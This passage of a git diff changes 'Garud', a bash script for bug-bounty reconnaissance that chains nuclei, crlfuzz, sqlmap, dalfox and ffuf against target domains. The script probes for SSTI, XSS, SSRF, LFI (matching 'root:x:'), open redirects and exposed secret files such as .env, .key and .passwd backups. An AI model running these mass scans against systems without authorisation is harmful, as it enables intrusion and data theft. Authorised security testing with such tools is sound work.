critical -c 50 -silent" 2> /dev/null | anew nuclei/critical.txt | notify -silent &> /dev/null + [ "$jsonout" == "False" ] || cat nuclei/info.txt | python3 -c "import sys; import json; print (json.dumps({'nuclei_info':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/info.json &> /dev/null + [ "$jsonout" == "False" ] || cat nuclei/low.txt | python3 -c "import sys; import json; print (json.dumps({'nuclei_low':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/low.json &> /dev/null + [ "$jsonout" == "False" ] || cat nuclei/medium.txt | python3 -c "import sys; import json; print (json.dumps({'nuclei_medium':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/medium.json &> /dev/null + [ "$jsonout" == "False" ] || cat nuclei/high.txt | python3 -c "import sys; import json; print (json.dumps({'nuclei_high':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/high.json &> /dev/null + [ "$jsonout" == "False" ] || cat nuclei/critical.txt | python3 -c "import sys; import json; print (json.dumps({'nuclei_critical':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/critical.json &> /dev/null [ "$silent" == "False" ] && cat nuclei/*.txt } -#------------------------------------------------------- #> VULNERABILITY SCANNING -vulnScan(){ - echo -e "${bold}Starting vulnerability scan on $domain${normal}" - [ ! -f injections/crlf.txt ] && crlfuzz -l domains/liveurls.txt -c $threads -s | anew injections/crlf.txt | notify -silent &> /dev/null +vulnscan(){ + echo -e "${BOLD}Starting vulnerability scan on $domain${NORMAL}" + [ ! -f "injections/crlf.txt" ] && crlfuzz -l domains/liveurls.txt -c $threads -s | anew injections/crlf.txt | notify -silent &> /dev/null [ "$silent" == "False" ] && cat injections/crlf.txt 2> /dev/null - [ "$silent" == "False" ] && echo -e "${red}${bold}-- CRLF: $(cat injections/crlf.txt 2> /dev/null | wc -l)${normal}\n" - [ ! -f injections/proto.txt ] && sed 's/$/\?__proto__[testparam]=exploit/' domains/liveurls.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULN]"' 2> /dev/null | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE" | anew injections/proto.txt | notify -silent &> /dev/null - [ "$silent" == "False" ] && cat injections/proto.txt 2> /dev/null - [ "$silent" == "False" ] && echo -e "${red}${bold}-- PROTOTYPE POLLUTION: $(cat injections/proto.txt 2> /dev/null | wc -l)${normal}\n" - cat domains/endpoints.txt | cut -d"?" -f1 | cut -d"=" -f1 | grep -iaE "([^.]+)\.zip$|([^.]+)\.zip\.[0-9]+$|([^.]+)\.zip[0-9]+$|([^.]+)\.zip[a-z][A-Z][0-9]+$|([^.]+)\.zip\.[a-z][A-Z][0-9]+$|([^.]+)\.rar$|([^.]+)\.tar$|([^.]+)\.tar\.gz$|([^.]+)\.tgz$|([^.]+)\.sql$|([^.]+)\.db$|([^.]+)\.sqlite$|([^.]+)\.pgsql\.txt$|([^.]+)\.mysql\.txt$|([^.]+)\.gz$|([^.]+)\.config$|([^.]+)\.log$|([^.]+)\.bak$|([^.]+)\.backup$|([^.]+)\.bkp$|([^.]+)\.crt$|([^.]+)\.dat$|([^.]+)\.eml$|([^.]+)\.java$|([^.]+)\.lst$|([^.]+)\.key$|([^.]+)\.passwd$|([^.]+)\.pl$|([^.]+)\.pwd$|([^.]+)\.mysql-connect$|([^.]+)\.jar$|([^.]+)\.cfg$|([^.]+)\.dir$|([^.]+)\.orig$|([^.]+)\.bz2$|([^.]+)\.old$|([^.]+)\.vbs$|([^.]+)\.img$|([^.]+)\.inf$|([^.]+)\.sh$|([^.]+)\.py$|([^.]+)\.vbproj$|([^.]+)\.mysql-pconnect$|([^.]+)\.war$|([^.]+)\.go$|([^.]+)\.psql$|([^.]+)\.sql\.gz$|([^.]+)\.vb$|([^.]+)\.webinfo$|([^.]+)\.jnlp$|([^.]+)\.cgi$|([^.]+)\.temp$|([^.]+)\.ini$|([^.]+)\.webproj$|([^.]+)\.xsql$|([^.]+)\.raw$|([^.]+)\.inc$|([^.]+)\.lck$|([^.]+)\.nz$|([^.]+)\.rc$|([^.]+)\.html\.gz$|([^.]+)\.gz$|([^.]+)\.env$|([^.]+)\.yml$" | httpx -silent -follow-host-redirects | anew -q domains/sensitivefiles.txt &> /dev/null - [ ! -f injections/ssti.txt ] && xargs -a temporary/ssti.txt -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"check-ssti49\" && echo -e \"[POTENTIAL SSTI] - % \n \"" 2> /dev/null | grep "POTENTIAL SSTI" | anew injections/ssti.txt | notify -silent &> /dev/null + [ "$jsonout" == "False" ] || cat injections/crlf.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_crlf':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/crlf.json &> /dev/null + [ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- CRLF: $(cat injections/crlf.txt 2> /dev/null | wc -l)${NORMAL}\n" + cat domains/endpoints.txt | cut -d"?" -f1 | cut -d"=" -f1 | grep -iaE "([^.]+)\.zip$|([^.]+)\.zip\.[0-9]+$|([^.]+)\.zip[0-9]+$|([^.]+)\.zip[a-z][A-Z][0-9]+$|([^.]+)\.zip\.[a-z][A-Z][0-9]+$|([^.]+)\.rar$|([^.]+)\.tar$|([^.]+)\.tar\.gz$|([^.]+)\.tgz$|([^.]+)\.sql$|([^.]+)\.db$|([^.]+)\.sqlite$|([^.]+)\.pgsql\.txt$|([^.]+)\.mysql\.txt$|([^.]+)\.gz$|([^.]+)\.config$|([^.]+)\.log$|([^.]+)\.bak$|([^.]+)\.backup$|([^.]+)\.bkp$|([^.]+)\.crt$|([^.]+)\.dat$|([^.]+)\.eml$|([^.]+)\.java$|([^.]+)\.lst$|([^.]+)\.key$|([^.]+)\.passwd$|([^.]+)\.pl$|([^.]+)\.pwd$|([^.]+)\.mysql-connect$|([^.]+)\.jar$|([^.]+)\.cfg$|([^.]+)\.dir$|([^.]+)\.orig$|([^.]+)\.bz2$|([^.]+)\.old$|([^.]+)\.vbs$|([^.]+)\.img$|([^.]+)\.inf$|([^.]+)\.sh$|([^.]+)\.py$|([^.]+)\.vbproj$|([^.]+)\.mysql-pconnect$|([^.]+)\.war$|([^.]+)\.go$|([^.]+)\.psql$|([^.]+)\.sql\.gz$|([^.]+)\.vb$|([^.]+)\.webinfo$|([^.]+)\.jnlp$|([^.]+)\.cgi$|([^.]+)\.tmp$|([^.]+)\.ini$|([^.]+)\.webproj$|([^.]+)\.xsql$|([^.]+)\.raw$|([^.]+)\.inc$|([^.]+)\.lck$|([^.]+)\.nz$|([^.]+)\.rc$|([^.]+)\.html\.gz$|([^.]+)\.gz$|([^.]+)\.env$|([^.]+)\.yml$" | httpx -silent -follow-host-redirects | anew -q domains/sensitivefiles.txt &> /dev/null + [ "$jsonout" == "False" ] || cat domains/sensitivefiles.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'sensitive':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/sensitive.json &> /dev/null + [ ! -f "injections/ssti.txt" ] && xargs -a .tmp/ssti.txt -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"check-ssti49\" && echo -e \"[POTENTIAL SSTI] - % \n \"" 2> /dev/null | grep "POTENTIAL SSTI" | anew injections/ssti.txt | notify -silent &> /dev/null [ "$silent" == "False" ] && cat injections/ssti.txt 2> /dev/null - [ "$silent" == "False" ] && echo -e "${red}${bold}-- SERVER-SIDE TEMPLATE INJECTION: $(cat injections/ssti.txt 2> /dev/null | wc -l)${normal}\n" - [ ! -f injections/xss.txt ] && xargs -a temporary/xss.txt -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"\" && echo -e \"[POTENTIAL XSS] - % \n \"" 2> /dev/null | grep "POTENTIAL XSS" | anew injections/xss.txt | notify -silent &> /dev/null + [ "$jsonout" == "False" ] || cat injections/ssti.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_ssti':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/ssti.json &> /dev/null + [ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- SERVER-SIDE TEMPLATE INJECTION: $(cat injections/ssti.txt 2> /dev/null | wc -l)${NORMAL}\n" + [ ! -f "injections/xss.txt" ] && xargs -a .tmp/xss.txt -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"\" && echo -e \"[POTENTIAL XSS] - % \n \"" 2> /dev/null | grep "POTENTIAL XSS" | anew injections/xss.txt | notify -silent &> /dev/null [ "$silent" == "False" ] && cat injections/xss.txt 2> /dev/null - [ "$silent" == "False" ] && echo -e "${red}${bold}-- CROSS-SITE SCRIPTING: $(cat injections/xss.txt 2> /dev/null | wc -l)${normal}\n" - [ ! -f injections/ssrf.txt ] && xargs -a temporary/ssrf.txt -P 50 -I % bash -c "curl -ks -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"compute.internal\" && echo -e \"[POTENTIAL SSRF] - % \n \"" 2> /dev/null | grep "POTENTIAL SSRF" | anew injections/ssrf.txt | notify -silent &> /dev/null + [ "$jsonout" == "False" ] || cat injections/xss.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_xss':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/xss.json &> /dev/null + [ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- CROSS-SITE SCRIPTING: $(cat injections/xss.txt 2> /dev/null | wc -l)${NORMAL}\n" + [ ! -f "injections/ssrf.txt" ] && xargs -a .tmp/ssrf.txt -P 50 -I % bash -c "curl -ks -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"compute.internal\" && echo -e \"[POTENTIAL SSRF] - % \n \"" 2> /dev/null | grep "POTENTIAL SSRF" | anew injections/ssrf.txt | notify -silent &> /dev/null [ "$silent" == "False" ] && cat injections/ssrf.txt 2> /dev/null - [ "$silent" == "False" ] && echo -e "${red}${bold}-- SERVER-SIDE REQUEST FORGERY: $(cat injections/ssrf.txt 2> /dev/null | wc -l)${normal}\n" - [ ! -f injections/lfi.txt ] && xargs -a temporary/lfi.txt -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"root:x:\" && echo -e \"[POTENTIAL LFI] - % \n \"" 2> /dev/null | grep "POTENTIAL LFI" | anew injections/lfi.txt | notify -silent &> /dev/null + [ "$jsonout" == "False" ] || cat injections/ssrf.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_ssrf':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/ssrf.json &> /dev/null + [ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- SERVER-SIDE REQUEST FORGERY: $(cat injections/ssrf.txt 2> /dev/null | wc -l)${NORMAL}\n" + [ ! -f "injections/lfi.txt" ] && xargs -a .tmp/lfi.txt -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"root:x:\" && echo -e \"[POTENTIAL LFI] - % \n \"" 2> /dev/null | grep "POTENTIAL LFI" | anew injections/lfi.txt | notify -silent &> /dev/null [ "$silent" == "False" ] && cat injections/lfi.txt 2> /dev/null - [ "$silent" == "False" ] && echo -e "${red}${bold}-- LOCAL FILE INCLUSION: $(cat injections/lfi.txt 2> /dev/null | wc -l)${normal}\n" - [ ! -f injections/redirect.txt ] && xargs -a temporary/redirect.txt -P 50 -I % bash -c "curl -s -iL -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"Evil.Com - We get it...Daily\" && echo -e \"[POTENTIAL REDIRECT] - % \n \"" 2> /dev/null | grep "POTENTIAL REDIRECT" | anew injections/redirect.txt | notify -silent &> /dev/null + [ "$jsonout" == "False" ] || cat injections/lfi.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_lfi':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/lfi.json &> /dev/null + [ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- LOCAL FILE INCLUSION: $(cat injections/lfi.txt 2> /dev/null | wc -l)${NORMAL}\n" + [ ! -f "injections/redirect.txt" ] && xargs -a .tmp/redirect.txt -P 50 -I % bash -c "curl -s -iL -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"Evil.Com - We get it...Daily\" && echo -e \"[POTENTIAL REDIRECT] - % \n \"" 2> /dev/null | grep "POTENTIAL REDIRECT" | anew injections/redirect.txt | notify -silent &> /dev/null [ "$silent" == "False" ] && cat injections/redirect.txt 2> /dev/null - [ "$silent" == "False" ] && echo -e "${red}${bold}-- OPEN-REDIRECTION: $(cat injections/redirect.txt 2> /dev/null | wc -l)${normal}\n" - [ ! -d injections/sqli ] && xargs -a domains/patterns/sqli.txt -P 50 -I % bash -c "python3 ~/tools/sqlmap/sqlmap.py -u % -b --batch --disable-coloring --random-agent --output-dir=injections/sqli/" 2> /dev/null &> /dev/null + [ "$jsonout" == "False" ] || cat injections/redirect.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'vuln_redirect':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/redirect.json &> /dev/null + [ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- OPEN-redirectION: $(cat injections/redirect.txt 2> /dev/null | wc -l)${NORMAL}\n" + [ ! -d injections/sqli ] && timeout 50m xargs -a domains/patterns/sqli.txt -P 50 -I % bash -c "python3 ~/tools/sqlmap/sqlmap.py -u % -b --batch --disable-coloring --random-agent --output-dir=injections/sqli/" 2> /dev/null &> /dev/null if [ -n "$blindxss" ]; then - dalfox file temporary/xssp.txt pipe --silence --no-color --no-spinner --mass --mass-worker 100 --skip-bav -b $blindxss -w 100 -H "X-Bugbounty: Testing" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" 2> /dev/null | anew injections/dalfoxss.txt | notify -silent &> /dev/null + dalfox file .tmp/xssp.txt --silence --no-color --no-spinner --mass --mass-worker 100 --skip-bav -b $blindxss -w 100 -H "X-Bugbounty: Testing" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" 2> /dev/null | anew injections/dalfoxss.txt | notify -silent &> /dev/null else - dalfox file temporary/xssp.txt pipe --silence --no-color --no-spinner --mass --mass-worker 100 --skip-bav -w 100 -H "X-Bugbounty: Testing" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" 2> /dev/null | anew injections/dalfoxss.txt | notify -silent &> /dev/null + dalfox file .tmp/xssp.txt --silence --no-color --no-spinner --mass --mass-worker 100 --skip-bav -w 100 -H "X-Bugbounty: Testing" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" 2> /dev/null | anew injections/dalfoxss.txt | notify -silent &> /dev/null fi [ "$silent" == "False" ] && cat injections/dalfoxss.txt 2> /dev/null - [ "$silent" == "False" ] && echo -e "${red}${bold}-- DALFOX: $(cat injections/dalfoxss.txt 2> /dev/null | wc -l)${normal}\n" + [ "$jsonout" == "False" ] || cat injections/dalfoxss.txt 2> /dev/null | python3 -c "import sys; import json; print (json.dumps({'dalfox':list(sys.stdin)}))" | sed 's/\\n//g' | tee .json/dalfox.json &> /dev/null + [ "$silent" == "False" ] && echo -e "${RED}${BOLD}-- DALFOX: $(cat injections/dalfoxss.txt 2> /dev/null | wc -l)${NORMAL}\n" + [ "$jsonout" == "False" ] || cat .json/*.json | jq -s 'add' 2> /dev/null | tee output.json &> /dev/null + [ "$remout" == "True" ] && rm -rf domains/*.txt domains/patterns/ injections/*.txt nuclei/ } -#------------------------------------------------------- #> DIRECTORY FUZZING -dirFuzz(){ - echo -e "${bold}Starting directory fuzzing on $domain${normal}" +fuzzdir(){ + echo -e "${BOLD}Starting directory fuzzing on $domain${NORMAL}" for target in $(cat domains/liveurls.txt); do fuzzout=$(echo $target | awk -F// '{print $NF}' | sed -E 's/[\.|:]+/_/g') - ffuf -u $target/FUZZ -ac -t 150 -mc 200 -sf -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" -w ~/wordlists/fuzz.txt -p '0.6-1.2' -e .html,.json,.php,.asp,.aspx,.log,.sql,.txt,.asp,.jsp,.bak,~,.db -maxtime 900 -o domains/directories/$fuzzout.json -s 2> /dev/null &> /dev/null + ffuf -u $target/FUZZ -ac -t 150 -mc 200 -sf -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" -w ~/wordlists/fuzz.txt -p '0.6-1.2' -e .html,.json,.php,.asp,.aspx,.log,.sql,.txt,.asp,.jsp,.bak,~,.db -maxtime 900 -o domains/fuzz/$fuzzout.json -s 2> /dev/null &> /dev/null cat domains/directories/$fuzzout.json | jq -r '.results[] | .status, .length, .url' 2> /dev/null | xargs -n3 | anew -q domains/directories/$fuzzout.txt rm -rf domains/directories/$fuzzout.json done } -#------------------------------------------------------- #> SENDING FINAL NOTIFICATION -finalnot(){ - echo -e "\n${bold}Time: $(date)${normal}" - echo -e "${bold}Scanning completed on $domain${normal}" +sendnote(){ + echo -e "" + echo -e "${BOLD}Scanning completed on $domain${NORMAL}" echo -e "[Garud] - Scanning completed on $domain at $(date)" | notify -silent } -#> NOTIFICATION SENDING COMPLETED -#------------------------------------------------------------------------------- - -runGarud(){ - subEnum 2> /dev/null - enumCrawl 2> /dev/null - nucleiScan 2> /dev/null - vulnScan 2> /dev/null - dirFuzz 2> /dev/null - finalnot + +vault(){ + subenum 2> /dev/null + webcrawl 2> /dev/null + nucleiscan 2> /dev/null + vulnscan 2> /dev/null + fuzzdir 2> /dev/null + sendnote 2> /dev/null } while true do - printBanner - makeFolders - runGarud + banner + makedir + vault exit 0 -done +done \ No newline at end of file diff --git a/install.sh b/install.sh index 63f0f7a..1dc1201 100644 --- a/install.sh +++ b/install.sh @@ -76,6 +76,9 @@ git clone https://github.com/codingo/Interlace.git ~/tools/interlace 2> /dev/nul cd ~/tools/interlace python3 setup.py install 2> /dev/null &> /dev/null +echo -e "-Installing bhedak" +cd && wget -q https://raw.githubusercontent.com/R0X4R/bhedak/main/bhedak && chmod +x bhedak && mv bhedak /usr/bin/ + echo -e "- Installing uro" cd && pip3 install tldextract 2> /dev/null &> /dev/null cd && pip3 install uro 2> /dev/null &> /dev/null